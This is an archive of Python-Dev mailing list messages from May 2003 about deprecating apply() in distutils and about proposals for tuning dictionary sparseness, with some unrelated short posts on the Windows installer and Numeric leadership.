> It causes warnings to be emitted when building packages with Python 2.3
> and -Wall, and is altogether unclean.
> 
> Is this just a matter of checking in a patch? Or submitting one to SF?
> Or is there a real desire to be compatible to Python 1.5.2?

I was wondering if a milder form of deprecation may be appropriate for
some features such as the apply builtin:

1. Add a notice in docstring 'not recommended for new code'
2. Move to 'obsolete' or 'backward compatibility' section in manual
3. Do NOT produce a warning (pychecker may still do that)
4. Do NOT plan removal of feature in a specific future release

    Oren


From martin@v.loewis.de  Mon May  5 06:55:56 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 05 May 2003 07:55:56 +0200
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <16053.50978.292901.471132@montanaro.dyndns.org>
References: <20030504185544.6010.qmail@green.zadka.com>
 <3EB5676C.1000900@python.org>
 <16053.50978.292901.471132@montanaro.dyndns.org>
Message-ID: <m365oqaqdv.fsf@mira.informatik.hu-berlin.de>

Skip Montanaro <skip@pobox.com> writes:

>     David> PEP 291 lists distutils as requiring 1.5.2 compatibility.
> 
> Then should distutils be suppressing those warnings?

This isn't trivial: the warnings module is not available in Python
1.5.2.

Regards,
Martin



From m@moshez.org  Mon May  5 07:40:51 2003
From: m@moshez.org (Moshe Zadka)
Date: 5 May 2003 06:40:51 -0000
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <m365oqaqdv.fsf@mira.informatik.hu-berlin.de>
References: <m365oqaqdv.fsf@mira.informatik.hu-berlin.de>, <20030504185544.6010.qmail@green.zadka.com>
 <3EB5676C.1000900@python.org>
 <16053.50978.292901.471132@montanaro.dyndns.org>
Message-ID: <20030505064051.29353.qmail@green.zadka.com>

[Trimming CC list]

On 05 May 2003, martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=) wrote:

> This isn't trivial: the warnings module is not available in Python
> 1.5.2.

Yes it is (trivial, not in 1.5.2)

try:
    import warnings
except ImportError:
    pass
else:
    ...disable warnings...

Thanks,
Moshe 
-- 
Moshe Zadka -- http://moshez.org/
Buffy: I don't like you hanging out with someone that... short.
Riley: Yeah, a lot of young people nowadays are experimenting with shortness.
Agile Programming Language -- http://www.python.org/


From mal@lemburg.com  Mon May  5 08:41:05 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 05 May 2003 09:41:05 +0200
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <20030504185544.6010.qmail@green.zadka.com>
References: <20030504185544.6010.qmail@green.zadka.com>
Message-ID: <3EB61591.5070204@lemburg.com>

Moshe Zadka wrote:
> Hi!
> I haven't seen this come up yet -- why is distutils still using apply?
> It causes warnings to be emitted when building packages with Python 2.3
> and -Wall, and is altogether unclean.

Could someone please explain why apply() was marked deprecated ?

The only reference I can find is in PEP 290 and that merely
reports this "fact".

I'm -1 on deprecating apply(). Not only because it introduces yet
another incompatibility between Python versions, but also because it
is still useful in the context of having a function which mimics
a function call, e.g. for map() and other instances where you
pass around functions as operators.

> Is this just a matter of checking in a patch? Or submitting one to SF?
> Or is there a real desire to be compatible to Python 1.5.2?

Yes. It was decided that Python 2.3 will ship with the last
version of distutils that is Python 1.5.2 compatible. After that
it may drop that compatibility and become Python 2.0 compatible.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 05 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        50 days left



From python@rcn.com  Mon May  5 10:28:51 2003
From: python@rcn.com (Raymond Hettinger)
Date: Mon, 5 May 2003 05:28:51 -0400
Subject: [Python-Dev] Dictionary sparseness
References: <LNBBLJKPBEHFEDALKOLCOEPDEEAB.tim.one@comcast.net>
Message-ID: <001501c312e8$bd892420$125ffea9@oemcomputer>

> it's-python-it's-supposed-to-be-slow<wink>-ly y'rs  - tim

Oh, now you tell me.
I've got about a hundred failed experiments that provide
slowdowns ranging from modest to excruciating.  Take
your pick.

My favorite:  Eliminating the test for dummy entry re-use 
ended up hurting every benchmark and completely
destroying a couple of them.


Raymond


 



From guido@python.org  Mon May  5 12:47:39 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 07:47:39 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: "Your message of Sun, 04 May 2003 22:22:08 EDT."
 <003301c312ad$2113e520$125ffea9@oemcomputer>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
 <200305050034.h450YXx23808@pcp02138704pcs.reston01.va.comcast.net>
 <003301c312ad$2113e520$125ffea9@oemcomputer>
Message-ID: <200305051147.h45Bldw24692@pcp02138704pcs.reston01.va.comcast.net>

> > Hm.  Maybe so, but it *is* a feature that there are no user controls
> > over dictionary behavior, based on the observation that for every user
> > who knows enough about the dict implementation to know how to tweak
> > it, there are at least 1000 who don't, and the latter, in their
> > ill-advised quest for more speed, will use the tweakage API to their
> > detriment.
> 
> Perhaps there should be safety-belts and kindergarten controls:
> 
>    d.pack(fat=False) --> None.  Reclaims deleted entries.
>          If optional fat argument is true, the internal size is doubled
>          resulting in potentially faster lookups at the expense of
>          slower iteration and more memory.
>   
> This ought to be both safe and simple.

And a waste of time except in the most rare circumstances.

> Raymond Hettinger
> 
> 
> P.S.  Also, I think it worthwhile to at least transform dictresize()
> into PyDict_Resize() so that C extensions will have some control.
> This would make it possible for us to add a single line making
> the builtin dictionary more sparse and providing a 75% first probe
> hit rate.

And that would give *how much* of a performance improvement for typical
applications?

Sorry, I really think that you're complexificating APIs here without
sufficient gain.  I really value the work you've done on figuring out
how to improve dicts, but I think you've come to know the code too
well to see the other side of the coin.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon May  5 13:02:08 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 08:02:08 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: "Your message of Mon, 05 May 2003 09:41:05 +0200."
 <3EB61591.5070204@lemburg.com>
References: <20030504185544.6010.qmail@green.zadka.com>
 <3EB61591.5070204@lemburg.com>
Message-ID: <200305051202.h45C28E24795@pcp02138704pcs.reston01.va.comcast.net>

> Could someone please explain why apply() was marked deprecated ?

Because it's more readable, more efficient, and more flexible to write
f(x, y, *t) than apply(f, (x, y) + t).

> The only reference I can find is in PEP 290 and that merely
> reports this "fact".
> 
> I'm -1 on deprecating apply(). Not only because it introduces yet
> another incompatiblity between Python versions, but also because it
> is still useful in the context of having a function which mimics
> a function call, e.g. for map() and other instance where you
> pass around functions as operators.

Then maybe we should add something like operator.__call__.

OTOH, you're lucky that map isn't deprecated yet in favor of list
comprehensions; I expect that Python 3.0 won't have map or filter
either.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon May  5 13:03:58 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 08:03:58 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: "Your message of Mon, 05 May 2003 01:23:35 EDT."
 <20030505052335.GA37311@hishome.net>
References: <20030504185544.6010.qmail@green.zadka.com>
 <20030505052335.GA37311@hishome.net>
Message-ID: <200305051204.h45C3w424811@pcp02138704pcs.reston01.va.comcast.net>

> I was wondering if a milder form of deprecation may be appropriate for
> some features such as the apply builtin:
> 
> 1. Add a notice in docstring 'not recommended for new code'
> 2. Move to 'obsolete' or 'backward compatibility' section in manual
> 3. Do NOT produce a warning (pychecker may still do that)
> 4. Do NOT plan removal of feature in a specific future release

The form of deprecation used for apply() is already very mild (you
don't get a warning unless you do -Wall).  I don't think Moshe's use
case is important enough to care; if Moshe cares, he can easily
construct a command line argument or warnings.filterwarnings() call to
suppress the warnings he doesn't care about.
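
(Something along these lines should do it -- a sketch, assuming apply()'s
warning is raised as a PendingDeprecationWarning, which is why it only
shows up under -Wall:)

    import warnings
    # Silence the pending-deprecation category; every other warning still
    # gets through when running under -Wall.
    warnings.filterwarnings("ignore", category=PendingDeprecationWarning)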

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Mon May  5 13:30:30 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 05 May 2003 14:30:30 +0200
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <200305051202.h45C28E24795@pcp02138704pcs.reston01.va.comcast.net>
References: <20030504185544.6010.qmail@green.zadka.com> <3EB61591.5070204@lemburg.com> <200305051202.h45C28E24795@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EB65966.6090005@lemburg.com>

Guido van Rossum wrote:
>>Could someone please explain why apply() was marked deprecated ?
> 
> Becase it's more readable, more efficient, and more flexible to write
> f(x, y, *t) than apply(f, (x, y) + t).

True, but it's in wide use out there, so it shouldn't go until
Python 3 is out the door.

BTW, shouldn't these deprecations be listed in e.g PEP 4 ?

There doesn't seem to be a single place to look for deprecated
features and APIs (PEP 4 only lists modules).

I find it rather troublesome that deprecation seems to be using
stealth mode of operation in Python development -- discussions
about it rarely surface until someone complains about a warning
relating to it. There should be open discussions about whether
or not to deprecate functionality.

>>The only reference I can find is in PEP 290 and that merely
>>reports this "fact".
>>
>>I'm -1 on deprecating apply(). Not only because it introduces yet
>>another incompatiblity between Python versions, but also because it
>>is still useful in the context of having a function which mimics
>>a function call, e.g. for map() and other instance where you
>>pass around functions as operators.
> 
> Then maybe we should add something like operator.__call__.

Why remove a common API and reinvent it somewhere else ?

> OTOH, you're lucky that map isn't deprecated yet in favor of list
> comprehensions; I expect that Python 3.0 won't have map or filter
> either.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 05 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        50 days left



From oren-py-d@hishome.net  Mon May  5 13:50:07 2003
From: oren-py-d@hishome.net (Oren Tirosh)
Date: Mon, 5 May 2003 08:50:07 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <200305051204.h45C3w424811@pcp02138704pcs.reston01.va.comcast.net>
References: <20030504185544.6010.qmail@green.zadka.com> <20030505052335.GA37311@hishome.net> <200305051204.h45C3w424811@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030505125007.GA20312@hishome.net>

On Mon, May 05, 2003 at 08:03:58AM -0400, Guido van Rossum wrote:
> > I was wondering if a milder form of deprecation may be appropriate for
> > some features such as the apply builtin:
> > 
> > 1. Add a notice in docstring 'not recommended for new code'
> > 2. Move to 'obsolete' or 'backward compatibility' section in manual
> > 3. Do NOT produce a warning (pychecker may still do that)
> > 4. Do NOT plan removal of feature in a specific future release
> 
> The form of deprecation used for apply() is already very mild (you
> don't get a warning unless you do -Wall).  I don't think Moshe's use
> case is important enough to care; if Moshe cares, he can easily
> construct a command line argument or warnings.filterwarning() call to
> suppress the warnings he doesn't care about.

My comment was not specifically about Moshe's use case - it's about the
meaning of deprecation in Python.

Does it always have to mean "start replacing because it *will* go away" 
as seems to be implied by PEP 5 or perhaps in some cases it could just 
mean "please don't use this in new code, okay" ?  

    Oren


From guido@python.org  Mon May  5 14:47:12 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 09:47:12 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: Your message of "Mon, 05 May 2003 14:30:30 +0200."
 <3EB65966.6090005@lemburg.com>
References: <20030504185544.6010.qmail@green.zadka.com> <3EB61591.5070204@lemburg.com> <200305051202.h45C28E24795@pcp02138704pcs.reston01.va.comcast.net>
 <3EB65966.6090005@lemburg.com>
Message-ID: <200305051347.h45DlCp30562@odiug.zope.com>

> Guido van Rossum wrote:
> >>Could someone please explain why apply() was marked deprecated ?
> > 
> > Becase it's more readable, more efficient, and more flexible to write
> > f(x, y, *t) than apply(f, (x, y) + t).
> 
> True, but it's in wide use out there, so it shouldn't go until
> Python 3 is out the door.

And it won't.  But that doesn't mean we can't add a PendingDeprecation
warning for it.

> BTW, shouldn't these deprecations be listed in e.g PEP 4 ?
> 
> There doesn't seem to be a single place to look for deprecated
> features and APIs (PEP 4 only lists modules).

That's a problem indeed.

> I find it rather troublesome that deprecation seems to be using
> stealth mode of operation in Python development -- discussions
> about it rarely surface until someone complains about a warning
> relating to it. There should be open discussions about whether
> or not to deprecate functionality.

I believe the discussions are open enough (things like this are never
decided at PythonLabs, but always brought out on python-dev).  But
it's easy to miss these discussions, and the records aren't always
clear.

> > Then maybe we should add something like operator.__call__.
> 
> Why remove a common API and reinvent it somewhere else ?

To reflect its demoted status.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon May  5 14:50:05 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 09:50:05 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: Your message of "Mon, 05 May 2003 08:50:07 EDT."
 <20030505125007.GA20312@hishome.net>
References: <20030504185544.6010.qmail@green.zadka.com> <20030505052335.GA37311@hishome.net> <200305051204.h45C3w424811@pcp02138704pcs.reston01.va.comcast.net>
 <20030505125007.GA20312@hishome.net>
Message-ID: <200305051350.h45Do5c30595@odiug.zope.com>

> My comment was not specifically about Moshe's use case - it's about
> the meaning of deprecation in Python.
> 
> Does it always have to mean "start replacing because it *will* go
> away" as seems to be implied by PEP 5 or perhaps in some cases it
> could just mean "please don't use this in new code, okay" ?

I think that can be safely left up to the individual programmer, who
has a better idea (hopefully) on the life expectancy of his code.  We
try to give guidance about the urgency of the deprecation e.g. in PEPs
or by using the normally-silent PendingDeprecation (which suggests
it's not urgent :-).

--Guido van Rossum (home page: http://www.python.org/~guido/)



From aahz@pythoncraft.com  Mon May  5 14:52:01 2003
From: aahz@pythoncraft.com (Aahz)
Date: Mon, 5 May 2003 09:52:01 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <001501c312e8$bd892420$125ffea9@oemcomputer>
References: <LNBBLJKPBEHFEDALKOLCOEPDEEAB.tim.one@comcast.net> <001501c312e8$bd892420$125ffea9@oemcomputer>
Message-ID: <20030505135201.GA14870@panix.com>

How about this: when we create read-only dicts, you add an optional
argument that re-packs the dict and optimizes for space or speed.  That
way, the dict can be analyzed to provide appropriate results.
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

"In many ways, it's a dull language, borrowing solid old concepts from
many other languages & styles:  boring syntax, unsurprising semantics,
few automatic coercions, etc etc.  But that's one of the things I like
about it."  --Tim Peters on Python, 16 Sep 93


From skip@pobox.com  Mon May  5 15:34:14 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 5 May 2003 09:34:14 -0500
Subject: [Python-Dev] How to test this?
Message-ID: <16054.30310.489999.134263@montanaro.dyndns.org>

I just added a patch file to <http://python.org/sf/731501>.  It doesn't
include any test cases, since that requires an old db hash v2 file present.
Is it okay to check in a dummy file to Lib/test for this purpose?

Thanks,

Skip



From BPettersen@NAREX.com  Mon May  5 15:55:02 2003
From: BPettersen@NAREX.com (Bjorn Pettersen)
Date: Mon, 5 May 2003 08:55:02 -0600
Subject: [Python-Dev] Windows installer request...
Message-ID: <60FB8BB7F0EFC7409B75EEEC13E20192022DE1FD@admin56.narex.com>

Would it be possible for the windows installer to use $SYSTEMDRIVE$ as
the default installation drive instead of C:? (On my XP box, C: is my
zip-drive, and E: is my SYSTEMDRIVE(*) -- I'm now re-installing :-)

If it's considered a good idea, and someone can point me to where the
change has to be made, I'd be more than willing to produce a patch...

-- bjorn

(*) Don't ask, MS wisdom I guess. Oh, and if you don't have a C: drive,
all your WinExplorer icons disappear (subst C: a: and it works :-) In any
case, I'm not brave enough to try to change it <wink>.


From oren-py-d@hishome.net  Mon May  5 15:58:06 2003
From: oren-py-d@hishome.net (Oren Tirosh)
Date: Mon, 5 May 2003 10:58:06 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <200305051350.h45Do5c30595@odiug.zope.com>
References: <20030504185544.6010.qmail@green.zadka.com> <20030505052335.GA37311@hishome.net> <200305051204.h45C3w424811@pcp02138704pcs.reston01.va.comcast.net> <20030505125007.GA20312@hishome.net> <200305051350.h45Do5c30595@odiug.zope.com>
Message-ID: <20030505145806.GA46311@hishome.net>

On Mon, May 05, 2003 at 09:50:05AM -0400, Guido van Rossum wrote:
> > My comment was not specifically about Moshe's use case - it's about
> > the meaning of deprecation in Python.
> >
> > Does it always have to mean "start replacing because it *will* go
> > away" as seems to be implied by PEP 5 or perhaps in some cases it
> > could just mean "please don't use this in new code, okay" ?
>
> I think that can be safely left up to the individual programmer, who
> has a better idea (hopefully) on the life expectancy of his code.  We
> try to give guidance about the urgency of the deprecation e.g. in PEPs
> or by using the normally-silent PendingDeprecation (which suggests
> it's not urgent :-).

I'm afraid this is too subtle for me. I'll ask my question a third time,
hoping for an answer that a mere mortal can understand:

Are all deprecated features on death row or are some of them merely
serving a life sentence?

    Oren

 "Do not meddle in the affairs of BDFLs,
  for they are subtle and quick to anger"


From guido@python.org  Mon May  5 16:10:43 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 11:10:43 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: Your message of "Mon, 05 May 2003 10:58:06 EDT."
 <20030505145806.GA46311@hishome.net>
References: <20030504185544.6010.qmail@green.zadka.com> <20030505052335.GA37311@hishome.net> <200305051204.h45C3w424811@pcp02138704pcs.reston01.va.comcast.net> <20030505125007.GA20312@hishome.net> <200305051350.h45Do5c30595@odiug.zope.com>
 <20030505145806.GA46311@hishome.net>
Message-ID: <200305051510.h45FAhY31026@odiug.zope.com>

> Are all deprecated features on death row or are some of them merely
> serving a life sentence?

They are all slated to go away.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Mon May  5 16:14:07 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 05 May 2003 11:14:07 -0400
Subject: [Python-Dev] Windows installer request...
In-Reply-To: <60FB8BB7F0EFC7409B75EEEC13E20192022DE1FD@admin56.narex.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEBGFJAA.tim.one@comcast.net>

[Bjorn Pettersen]
> Would it be possible for the windows installer to use $SYSTEMDRIVE$ as
> the default installation drive instead of C:? (On my XP box, C: is my
> zip-drive, and E: is my SYSTEMDRIVE(*) -- I'm now re-installing :-)

Are you saying that the "Select Destination Directory" dialog box doesn't
allow you to select your E: drive?  Or just that you'd rather not need to
select the drive you want?

> If it's considered a good idea, and someone can point me to where the
> change has to be made, I'd be more than willing to produce a patch...

I apparently left this comment in the Wise script:

    Note from Tim:  doesn't seem to be a way to get the true boot drive,
    the Wizard hardcodes "C".

So, AFAIK, there isn't a straightforward way to get Wise 8.14 to suggest a
drive other than C:.  Perhaps it would work better for you if I removed the
Wizard-generated hardcoded "C:" (I don't know which drive Wise would pick
then), but since yours is the only complaint about this I've seen, and I
have no way to test such a change, I'm very reluctant to fiddle with it.



From Jack.Jansen@oratrix.com  Mon May  5 16:35:55 2003
From: Jack.Jansen@oratrix.com (Jack Jansen)
Date: Mon, 5 May 2003 17:35:55 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <001301c31290$fcea25e0$125ffea9@oemcomputer>
Message-ID: <42A588E4-7F0F-11D7-B65D-003065517236@oratrix.com>

I sort-of agree with Guido that any calls to optimize dictionaries may
do more harm than good, but I think that if we make the interface
sufficiently abstract we may have something that works.  I was thinking
of something analogous to madvise(): the user can specify high-level
access patterns.

For Python dictionaries the access patterns would probably be
- I'm going to write a lot of stuff
- I'm done writing, and from now on I'm mainly going to read
- I haven't a clue what I'm going to do

Especially the "I'm going to read from now on" could be put to good use,
for instance after completing the dictionary of a class.
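
(Purely hypothetical spelling of the idea -- no such method exists on dicts;
and, like madvise() hints, the advice could legally be a no-op:)

    class advisable_dict(dict):
        def advise(self, pattern):
            # "writing", "reading" or "unknown"; a real implementation might
            # repack or resize the table here, or do nothing at all.
            assert pattern in ("writing", "reading", "unknown")

    d = advisable_dict()
    d["x"] = 1
    d.advise("reading")   # done writing, mostly lookups from now on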
--
- Jack Jansen        <Jack.Jansen@oratrix.com>        
http://www.cwi.nl/~jack -
- If I can't dance I don't want to be part of your revolution -- Emma 
Goldman -



From skip@pobox.com  Mon May  5 16:43:55 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 5 May 2003 10:43:55 -0500
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <42A588E4-7F0F-11D7-B65D-003065517236@oratrix.com>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
 <42A588E4-7F0F-11D7-B65D-003065517236@oratrix.com>
Message-ID: <16054.34491.64051.134832@montanaro.dyndns.org>

    Jack> I was thinking of something analogous to madvise(): ...

Quick, everyone who's used madvise() please raise your hand...  I'll bet a
beer most people (even on this list) have never put it to good use.  We all
know Tim probably has just because he's Tim, and apparently Jack has.
Anyone else?  Guido, have you ever been tempted?

Skip


From guido@python.org  Mon May  5 16:58:44 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 11:58:44 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: Your message of "Mon, 05 May 2003 10:43:55 CDT."
 <16054.34491.64051.134832@montanaro.dyndns.org>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <42A588E4-7F0F-11D7-B65D-003065517236@oratrix.com>
 <16054.34491.64051.134832@montanaro.dyndns.org>
Message-ID: <200305051558.h45Fwi531325@odiug.zope.com>

>     Jack> I was thinking of something analogous to madvise(): ...
> 
> Quick, everyone who's used madvise() please raise your hand...  I'll bet a
> beer most people (even on this list) have never put it to good use.  We all
> know Tim probably has just because he's Tim, and apparently Jack has.
> Anyone else?  Guido, have you ever been tempted?

What's madvise()? :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From paul@pfdubois.com  Mon May  5 17:13:17 2003
From: paul@pfdubois.com (Paul Dubois)
Date: Mon, 5 May 2003 09:13:17 -0700
Subject: [Python-Dev] Election of Todd Miller as head of numpy team
Message-ID: <000001c31321$3dc958c0$6801a8c0@NICKLEBY>

Todd Miller has been elected as the new Head of the Numeric Python
development team. 

I am still an active developer, but it was time to rotate responsibilities.
We especially need help with Numeric maintenance while Todd is working on
Numarray.

Thanks to all of you who helped me during my tenure.

Remember, when you see Todd, the expected greeting to the NummieHead is a
salute with more than one finger, accompanied by the cry, "Ni Ni Numpy!".
See the file DEVELOPERS in the distribution for our "constitution".

Paul



From aleax@aleax.it  Mon May  5 17:42:02 2003
From: aleax@aleax.it (Alex Martelli)
Date: Mon, 5 May 2003 18:42:02 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <16054.34491.64051.134832@montanaro.dyndns.org>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <42A588E4-7F0F-11D7-B65D-003065517236@oratrix.com> <16054.34491.64051.134832@montanaro.dyndns.org>
Message-ID: <200305051842.02937.aleax@aleax.it>

On Monday 05 May 2003 05:43 pm, Skip Montanaro wrote:
>     Jack> I was thinking of something analogous to madvise(): ...
>
> Quick, everyone who's used madvise() please raise your hand...  I'll bet a
> beer most people (even on this list) have never put it to good use.  We all
> know Tim probably has just because he's Tim, and apparently Jack has.

I used madvise extensively (and quite successfully) back when I was the
senior software consultant responsible for the lower-levels of a variety of
Unix-system ports of a line of mechanical CAD products.  And I loved and
still love the general concept -- let me advise an optimizer (so it can do
whatever -- be it a little or a lot -- rather than spend energy trying to 
guess what in blazes I may be doing:-).


Alex



From guido@python.org  Mon May  5 17:47:06 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 12:47:06 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: Your message of "Mon, 05 May 2003 18:42:02 +0200."
 <200305051842.02937.aleax@aleax.it>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <42A588E4-7F0F-11D7-B65D-003065517236@oratrix.com> <16054.34491.64051.134832@montanaro.dyndns.org>
 <200305051842.02937.aleax@aleax.it>
Message-ID: <200305051647.h45Gl6N04048@odiug.zope.com>

> I used madvise extensively (and quite successfully) back when I was
> the senior software consultant responsible for the lower-levels of a
> variety of Unix-system ports of a line of mechanical CAD products.
> And I loved and still love the general concept -- let me advise an
> optimizer (so it can do whatever -- be it a little or a lot --
> rather than spend energy trying to guess what in blazes I may be
> doing:-).

Hm.  How do you know that you were successful?  I could think of an
implementation that's similar to those "press to cross" buttons you
see at some intersections, and which seem to have no effect whatsoever
on the traffic lights. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy@zope.com  Mon May  5 18:11:50 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 05 May 2003 13:11:50 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <200305051842.02937.aleax@aleax.it>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
 <42A588E4-7F0F-11D7-B65D-003065517236@oratrix.com>
 <16054.34491.64051.134832@montanaro.dyndns.org>
 <200305051842.02937.aleax@aleax.it>
Message-ID: <1052154710.12534.14.camel@slothrop.zope.com>

On Mon, 2003-05-05 at 12:42, Alex Martelli wrote:
> On Monday 05 May 2003 05:43 pm, Skip Montanaro wrote:
> >     Jack> I was thinking of something analogous to madvise(): ...
> >
> > Quick, everyone who's used madvise() please raise your hand...  I'll bet a
> > beer most people (even on this list) have never put it to good use.  We all
> > know Tim probably has just because he's Tim, and apparently Jack has.
> 
> I used madvise extensively (and quite successfully) back when I was the
> senior software consultant responsible for the lower-levels of a variety of
> Unix-system ports of a line of mechanical CAD products.  And I loved and
> still love the general concept -- let me advise an optimizer (so it can do
> whatever -- be it a little or a lot -- rather than spend energy trying to 
> guess what in blazes I may be doing:-).

Have you seen the work on gray-box systems?

http://www.cs.wisc.edu/graybox/

The philosophy of this project seems to be "You can observe an awful lot
just by watching."  (Apologies to Yogi.)  The approach is to learn how a
particular service is implemented, e.g. what buffer-replacement
algorithm is used, by observing its behavior.  Then write an application
that exploits that knowledge to drive the system into optimized behavior
for  the application.  No madvise() necessary.

I wonder if the same can be done for dicts?  My first guess would be no,
because the sparseness is a fixed policy.

Jeremy




From aleax@aleax.it  Mon May  5 18:22:53 2003
From: aleax@aleax.it (Alex Martelli)
Date: Mon, 5 May 2003 19:22:53 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <200305051647.h45Gl6N04048@odiug.zope.com>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <200305051842.02937.aleax@aleax.it> <200305051647.h45Gl6N04048@odiug.zope.com>
Message-ID: <200305051922.53855.aleax@aleax.it>

On Monday 05 May 2003 06:47 pm, Guido van Rossum wrote:
> > I used madvise extensively (and quite successfully) back when I was
> > the senior software consultant responsible for the lower-levels of a
> > variety of Unix-system ports of a line of mechanical CAD products.
> > And I loved and still love the general concept -- let me advise an
> > optimizer (so it can do whatever -- be it a little or a lot --
> > rather than spend energy trying to guess what in blazes I may be
> > doing:-).
>
> Hm.  How do you know that you were succesful?  I could think of an

By measuring applications' performance on important benchmarks (mostly
not artificial ones, but rather actual benchmarks used in the past by some
customers to help them choose which CAD package to buy -- we treasured
those, at that firm, and had built up quite a portfolio of them over the 
years).  As CPUs and floating-point units became fast enough, more and
more of the speed issues with so-called "CPU intensive" bottlenecks in
mechanical-engineering CAD actually became related to memory-access
patterns (a phenomenon I had already observed when I worked on IBM
multi-CPU mainframes with vector-units, being sold as "supercomputers" 
but in fact still having complex and deep memory hierarchies -- Cray guys
of the time such as Tim no doubt had it easier!-).

> implementation that's similar to those "press to cross" buttons you
> see at some intersections, and which seem to have no effect whatsoever
> on the traffic lights. :-)

Yes, there were a few of those, too.  That's part of what's cool about
an "advise" operation: it IS quite OK to implement it as a no-op, both in
the early times when you're moving an existing API to some new
platform, AND in (hypothetical:-) late maturity when your optimizer's
pattern-detector has become able to outsmart the programmer on a
regular basis.  C's "register" keyword is a familiar example: it was quite
precious in very early compilers with nearly nonexistent optimizers, it
was regularly ignored in new compilers for very limited (and particularly
register-limited) platforms, and it's invariably ignored now that optimizers
have become able to allocate registers better than most programmers.
(It should probably have been a #pragma rather than eat up a reserved
word, but that's just syntactic-level hindsight:-).


Alex



From aleax@aleax.it  Mon May  5 18:36:20 2003
From: aleax@aleax.it (Alex Martelli)
Date: Mon, 5 May 2003 19:36:20 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <1052154710.12534.14.camel@slothrop.zope.com>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <200305051842.02937.aleax@aleax.it> <1052154710.12534.14.camel@slothrop.zope.com>
Message-ID: <200305051936.20078.aleax@aleax.it>

On Monday 05 May 2003 07:11 pm, Jeremy Hylton wrote:
   ...
> Have you seen the work on gray-box systems?
>
> http://www.cs.wisc.edu/graybox/
>
> The philosophy of this project seems to be "You can observe an awful lot
> just by watching."  (Apologies to Yogi.)  The approach is to learn how a
> particular service is implemented, e.g. what buffer-replacement
> algorithm is used, by observing its behavior.  Then write an application
> that exploits that knowledge to drive the system into optimized behavior
> for  the application.  No madvise() necessary.

Haven't read that URL, but this seems to summarize the way we had
to work with Fortran compilers on 3090-VF's back in the late '80s -- no
way to explicitly advise the compiler about what and how to vectorize,
so, lots of experimentation and tweaking to find out what the (expletive
deleted) heuristics the GD beast was using, and how to outsmart it
and get it to vectorize what *WE* wanted rather than what *IT* thought
was good for us.

What fun!  And of course we got to redo it all over again when a new
compiler release came out.

No thanks.  I've paid my dues and I hope I will *NEVER* again have to
work with a system that thinks it's so smart it doesn't need my advisory
input -- or at least not on anything that's as performance-crucial as
those Fortran programs were (most of my work in IBM Research I
did with Rexx -- that's when I learned to love scripting! -- but now and
again we did have to crunch really huge batches of numbers).


Alex



